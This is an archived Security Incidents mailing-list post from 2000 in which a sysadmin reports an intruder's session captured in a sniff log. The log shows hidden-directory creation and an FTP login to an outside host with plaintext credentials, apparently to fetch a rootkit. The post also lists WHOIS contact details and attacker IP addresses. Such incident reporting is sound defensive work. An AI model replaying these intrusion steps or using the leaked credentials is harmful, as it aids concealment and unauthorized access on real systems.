Security Incidents mailing list archives

rootkit site found in sniff log (??)

From: filipg () CORONA EPS PITT EDU (Filip M. Gieszczykiewicz)
Date: Sun, 9 Jan 2000 05:29:29 -0500


I was looking throught he sniff log (only 2 days of data
preserved) to e-mail the sysadmins of probed/cracked sites
when I found this:

---------
     : ls
     : mkdir /^H.a
     : mkdir .a
     : cd .a
     : ftp ftp.xoom.com
USER chrometnt
PASS phorce31337
---------

Smells of a skript-kiddie... falls into his own latrine...

---------
   Registrant:____________________________________________
   XOOM.com, Inc. (XOOM2-DOM)_____________________________
      300 Montgomery St., 3rd Floor_______________________
      San Francisco, CA 94104_____________________________
      Domain Name: XOOM.COM_______________________________
      Administrative Contact, Technical Contact, Zone Cont
         Smith, Dave  (DS8987)  dave@XOOM.COM_____________
         (415) 288-2500 (FAX) (415) 288-2580______________
      Billing Contact:____________________________________
         Administrator, Billing  (AB401-ORG)  billing@XOOM
         (415) 288-2500___________________________________
    Fax- (415) 288-2580____________________________________
      Record last updated on 12-Jul-1999._________________
      Record created on 03-Dec-1996.______________________
      Database last updated on 8-Jan-2000 12:47:34 EST.___
      Domain servers in listed order:_____________________
      NAME.ROC.FRONTIERNET.NET  209.130.187.10_____________
      NAME.PHX.FRONTIERNET.NET  206.165.6.10_______________
      NS1.XOOM.COM                      206.132.185.58_____
      NS2.XOOM.COM                      206.132.185.59____
      NS3.XOOM.COM                      206.132.185.199__
---------

This was ON another host!! (local to us). I will be sending
their full info into Pitt's security folks and to root@host.

User(s) doing the connecting/cracking:

Name:    mel-0511-145.ports.iprimus.net.au
Address:  202.138.39.145

*AND*

Name:    mel-0212-234.ports.iprimus.net.au
Address:  203.134.25.234

*AND*

Name:    ppp-003.cust20.adl.chariot.net.au
Address:  210.9.20.3

Cheers,
Filip G.

Filip "I'll buy a vowel" Gieszczykiewicz  |  http://www.repairfaq.org/
                                             (filipg () corona eps pitt edu)
I am the river itself and the leaf floating its currents.
I am steering. I am swept. I am.

Current thread:

Scanners using netcraft? Michael Damm (Jan 05)
- Re: Scanners using netcraft? Richard Trott (Jan 05)
- Re: Scanners using netcraft? Mike Johnson (Jan 05)
  - Got cracked/attacked this morning Filip M. Gieszczykiewicz (Jan 08)
  - god damn - we got rooted again (long, alas) Filip M. Gieszczykiewicz (Jan 09)
  - rootkit site found in sniff log (??) Filip M. Gieszczykiewicz (Jan 09)
- Re: Scanners using netcraft? Al Huger - Mail Account (Jan 05)
- Port 3593 Raistlin (Jan 05)
- Re: Scanners using netcraft? sekurity (Jan 05)
- <Possible follow-ups>
- Re: Scanners using netcraft? Eric Cholet (Jan 05)
  - Re: Scanners using netcraft? mea culpa (Jan 10)